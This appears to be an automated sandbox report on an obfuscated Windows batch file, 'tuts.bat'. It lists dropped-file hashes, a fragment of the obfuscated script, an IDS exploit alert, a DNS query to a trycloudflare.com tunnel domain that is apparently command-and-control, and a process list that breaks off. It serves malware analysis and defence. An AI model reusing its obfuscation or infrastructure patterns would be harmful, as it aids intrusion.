                    SSDEEP:12:YvXKXtCZc0v7nGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhWu:Yv6XtCzv7n168CgEXX5kcIfANhr
                    MD5:50BD6BD3B3EE5DF791D69F6E148FD8D6
                    SHA1:141FF41AE1EEF7C36DF6C7E9CDA3CF0A1F59488D
                    SHA-256:65DF6139C437F6DEFC450B6B39875437829DE97C0904EBCEA7FAE707B2A400A1
                    SHA-512:35A167DA20A9D5B8C0F40F5A8EDCC4499DF304EDBBF5047F83F313BF8D0C89C7A749E304D7D8AFFECE70179BCF3F3DE3F9A9E1F53F63AAC008DB7283D6B18522
                    Malicious:false
                    Preview:{"analyticsData":{"responseGUID":"7507dae1-4629-4ae6-8306-b94877c126ab","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1730622729489,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1730445804526}}}}
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4
                    Entropy (8bit):0.8112781244591328
                    Encrypted:false
                    SSDEEP:3:e:e
                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                    Malicious:false
                    Preview:....
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:JSON data
                    Category:dropped
                    Size (bytes):2818
                    Entropy (8bit):5.122968536089714
                    Encrypted:false
                    SSDEEP:48:Yrj1kTSGby3yUOgfrHd2wZcwEybMn9Fi9:aj1kDb4mgfrHd2Qaym6
                    MD5:C0F021F1089C247BAB11BDA09F2C5545
                    SHA1:140FFCAD66DBE7444C1C2F2BC51CA70BF62C020D
                    SHA-256:A978E8C78BD5A9B35FB2E62729A050DDA0ED12CA140E78F0999EBDD28C5CFFD1
                    SHA-512:C7A68E97F5EE64F58B2094F4A6E97D5C4C770F32DAF65DFFFEC1C756EC4BFC8F5374878B6AED5B8CB8D4088EEBADBEC90621EFDE7A39C897AB4054404607C94E
                    Malicious:false
                    Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"93bd18267d326d0a934eac192ce38019","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1730445803000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f1e6998a0b79aa9d10ed0e24b974ad57","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1730445803000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"ab77322e7a5745e667d16a690d1cec6c","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1730445803000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"e386047d7eef06949095dae3c48d2064","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1730445803000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d17e6d5568f2d324a5f2d4b9c10fd227","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1730445803000},{"id":"Edit_InApp_Aug2020","info":{"dg":"e7add3a53a54b65e84eda570f86a1744","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):1.1885241885846287
                    Encrypted:false
                    SSDEEP:48:TGufl2GL7msEHUUUUUUUUFW6SvR9H9vxFGiDIAEkGVvpxW8:lNVmswUUUUUUUUFL+FGSItFj
                    MD5:1176450FAE4E3C2547C033E97BF8B078
                    SHA1:5962118C35BC3C03B28939DA0F3FE6AE95E2450D
                    SHA-256:8E346B605A06C715BCDE428E18777C762BC5A6425438548E10ADF75A414A869C
                    SHA-512:5972C5A1B3674378CE1E4C91EF1C42EDF471FA7A223A06F30A6CEA5A1EE112F23838B8E6DE77E613FD7DF9C2CAE457A4D964D8DB958E4ECF5695892D18B130C6
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:SQLite Rollback Journal
                    Category:dropped
                    Size (bytes):8720
                    Entropy (8bit):1.608082708214136
                    Encrypted:false
                    SSDEEP:48:7MBNKUUUUUUUUUUFW4vR9H9vxFGiDIAEkGVv0QqFl2GL7mso:7FUUUUUUUUUUFXFGSIt9KVmso
                    MD5:7FF17023B61EF73E0C2307922B8CBFA0
                    SHA1:E027B3FAE6056B7DF2561F6E81C4BF6BD7F0DE59
                    SHA-256:8C8DD467271F0BCE2334683E012AC92AE59E9F651278E02AC41BD68964E5F986
                    SHA-512:AC5650009343618370A48CA7BB7829ED7E75077A8AE0E1CECB73ADC6D263A92D5995D35422236AC14309C99DBA7F320800F5ACB6DE00EDC888FA905429FA09B1
                    Malicious:false
                    Preview:.... .c.......I.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):1.1940658735648508
                    Encrypted:false
                    SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                    MD5:DA1F22117B9766A1F0220503765A5BA5
                    SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                    SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                    SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                    Malicious:false
                    Preview:@...e.................................R..............@..........
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):246
                    Entropy (8bit):3.4965336456103326
                    Encrypted:false
                    SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K80QPltRlYH:Qw946cPbiOxDlbYnuRKiDYH
                    MD5:A82FA5D2694F3240A39EB83D6A1E8B5A
                    SHA1:08A2E696A6C475F08D0FBAC3DDFB90D4B06A20B9
                    SHA-256:22C0C2FBF28935E5C65C75AF29BB0241D231DEAD46ED82A17C3890C1FD12995A
                    SHA-512:579F62F387A7808847FE9E84A46004AE5AB9A6EF614E72658D7C659F5EA3562FDC6A4BF007CB499C0A209E9B4D6D4B4C807582035C62768217A755D13E4D5BE6
                    Malicious:false
                    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.1./.1.1./.2.0.2.4. . .0.3.:.2.3.:.2.0. .=.=.=.....
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393)
                    Category:dropped
                    Size (bytes):16525
                    Entropy (8bit):5.345946398610936
                    Encrypted:false
                    SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                    MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                    SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                    SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                    SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                    Malicious:false
                    Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with very long lines (393), with CRLF line terminators
                    Category:dropped
                    Size (bytes):15114
                    Entropy (8bit):5.333739855529926
                    Encrypted:false
                    SSDEEP:384:GUrBdBGBFBHBcB3LSUStSLSsSSS/zuzSz8zQ99DDJDDSDDfDDDRrPgeYerHg6k6Y:dXg
                    MD5:33D9D1B9958FF91FC1301A64717112E6
                    SHA1:57F81740415E78671F9285B6CF37918A7CEBE4C1
                    SHA-256:8DE11F4790324FD0314350CA336A128FD248906C051E00184EF6CE1E3CC551AF
                    SHA-512:CD6F923496C1E05963E099FA392C91BC0042C741EF45165D52C9AE1DC5C40F47A1A405590EB7C711B044931C11F5377BBCE841AA091ED427DFDE468BD2E60668
                    Malicious:false
                    Preview:SessionID=caec2f58-a0ac-459c-90c5-71a3670517fd.1730445792242 Timestamp=2024-11-01T03:23:12:242-0400 ThreadID=1076 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=caec2f58-a0ac-459c-90c5-71a3670517fd.1730445792242 Timestamp=2024-11-01T03:23:12:243-0400 ThreadID=1076 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=caec2f58-a0ac-459c-90c5-71a3670517fd.1730445792242 Timestamp=2024-11-01T03:23:12:243-0400 ThreadID=1076 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=caec2f58-a0ac-459c-90c5-71a3670517fd.1730445792242 Timestamp=2024-11-01T03:23:12:243-0400 ThreadID=1076 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=caec2f58-a0ac-459c-90c5-71a3670517fd.1730445792242 Timestamp=2024-11-01T03:23:12:243-0400 ThreadID=1076 Component=ngl-lib_NglAppLib Description="SetConf
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):29752
                    Entropy (8bit):5.383493883193718
                    Encrypted:false
                    SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rb:3
                    MD5:6D88D56835EAF51C52BC2635194ADF62
                    SHA1:78C089CD7683011932DB234A73DE831285B97FB3
                    SHA-256:05AE9D6F5FCED664E82BBD984C26F09863BBA4249AEC9D1FB95D629B81C8E10F
                    SHA-512:DC7024F38DE1E8567BECFADFFC5DBCA045240648412C5F150BC6AE8E2A2979B5C436AD2D2CA84ED8976955B749093A365243D68B943CAFC3EF3043F553A5B37C
                    Malicious:false
                    Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                    Category:dropped
                    Size (bytes):386528
                    Entropy (8bit):7.9736851559892425
                    Encrypted:false
                    SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                    MD5:5C48B0AD2FEF800949466AE872E1F1E2
                    SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                    SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                    SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                    Malicious:false
                    Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                    Category:dropped
                    Size (bytes):758601
                    Entropy (8bit):7.98639316555857
                    Encrypted:false
                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                    MD5:3A49135134665364308390AC398006F1
                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                    Malicious:false
                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                    Category:dropped
                    Size (bytes):1407294
                    Entropy (8bit):7.97605879016224
                    Encrypted:false
                    SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZjZwYIGNPJe:RB3mlind9i4ufFXpAXkrfUs03WLaGZje
                    MD5:716C2C392DCD15C95BBD760EEBABFCD0
                    SHA1:4B4CE9C6AED6A7F809236B2DAFA9987CA886E603
                    SHA-256:DD3E6CFC38DA1B30D5250B132388EF73536D00628267E7F9C7E21603388724D8
                    SHA-512:E164702386F24FF72111A53DA48DC57866D10DAE50A21D4737B5687E149FF9D673729C5D2F2B8DA9EB76A2E5727A2AFCFA5DE6CC0EEEF7D6EBADE784385460AF
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                    Category:dropped
                    Size (bytes):1419751
                    Entropy (8bit):7.976496077007677
                    Encrypted:false
                    SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                    MD5:95F182500FC92778102336D2D5AADCC8
                    SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                    SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                    SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                    Malicious:false
                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                    Process:C:\Windows\System32\cmd.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):14
                    Entropy (8bit):3.521640636343319
                    Encrypted:false
                    SSDEEP:3:Mrv:gv
                    MD5:CE585C6BA32AC17652D2345118536F9C
                    SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                    SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                    SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                    Malicious:false
                    Preview:ECHO is off...
                    Process:C:\Windows\System32\timeout.exe
                    File Type:ASCII text, with CRLF line terminators, with overstriking
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):4.4936933125951875
                    Encrypted:false
                    SSDEEP:3:hYFJAR+mQRKVxLZRtWcyn:hYFDaNZiRn
                    MD5:1E2AC613338A8A1B2FAA866942CF7289
                    SHA1:57BDF3D09C298EF7626707C60DFAC8E2E12B0405
                    SHA-256:D676A2AE7C46320E1591C41EFF3848BBC49C6CD99B9B95FE4E43D6126E2799AA
                    SHA-512:FA359C579CBC4994996634DBA18BA29187BC6742C34508D5C3F6530DC14D10807D6BBB8D95DF4225AE6F620B2B517069D0AC4DF8D757105D39FB6D302D570CFF
                    Malicious:false
                    Preview:..Waiting for 5 seconds, press a key to continue ....4.3.2.1.0..
                    File type:Unicode text, UTF-16, little-endian text, with very long lines (29307), with no line terminators
                    Entropy (8bit):5.727556492607068
                    TrID:
                    • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                    • MP3 audio (1001/1) 33.33%
                    File name:tuts.bat
                    File size:58'616 bytes
                    MD5:b89957d9c0b8644f65ee704c5a611f85
                    SHA1:685b1121fc5b34918610d3df23cdd8e93ddf1f71
                    SHA256:2e434d523df8fcbdc81fe75d6a08a0e8a8595abf71ae5170adba5854c3ba4213
                    SHA512:d3bee1f715ef0835d4763868f1228584f45dd3adec50dd35b1071c835a8fc3117cf81e1747c5d1bb995a1086c9e249bb821f610bf24d7fa95541ec6aaad71273
                    SSDEEP:384:e0AXAigJ2fVP9iGH/fkSYovqb737jO+hHFCqydiTJAuZrdQhtUum:H6Ax8l9vH/fd/vqb73O8mdiTJ/r+htW
                    TLSH:6043E244A79F2A9FB0A19379D1011A9220DCA83D76BF587709393C3FFBE24594225F38
                    File Content Preview:....>nul 2>&1 &cls.; ;@e^%...( ..._...)...(........)...( ..._...)...(........)(........)(........)^%%...(......_...)...(........)...^(......_...)...(........)...( ..._...)......(......_...)...%ch%(.........)...(......_...)......( ..._...)......( ..._...).
                    Icon Hash:9686878b929a9886
                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-11-01T08:23:27.215401+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449745TCP
                    2024-11-01T08:24:06.073621+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow152.149.20.212443192.168.2.449777TCP
                    TimestampSource PortDest PortSource IPDest IP
                    Nov 1, 2024 08:23:20.692949057 CET5877453192.168.2.41.1.1.1
                    Nov 1, 2024 08:23:20.702681065 CET53587741.1.1.1192.168.2.4
                    Nov 1, 2024 08:23:21.796827078 CET5769653192.168.2.41.1.1.1
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Nov 1, 2024 08:23:20.692949057 CET192.168.2.41.1.1.10x977fStandard query (0)terrorists-cultures-wallpaper-tabs.trycloudflare.comA (IP address)IN (0x0001)false
                    Nov 1, 2024 08:23:21.796827078 CET192.168.2.41.1.1.10xf708Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Nov 1, 2024 08:23:20.702681065 CET1.1.1.1192.168.2.40x977fName error (3)terrorists-cultures-wallpaper-tabs.trycloudflare.comnonenoneA (IP address)IN (0x0001)false
                    Nov 1, 2024 08:23:21.803728104 CET1.1.1.1192.168.2.40xf708No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:03:23:07
                    Start date:01/11/2024
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tuts.bat" "
                    Imagebase:0x7ff666ba0000
                    File size:289'792 bytes
                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:1
                    Start time:03:23:07
                    Start date:01/11/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:03:23:07
                    Start date:01/11/2024
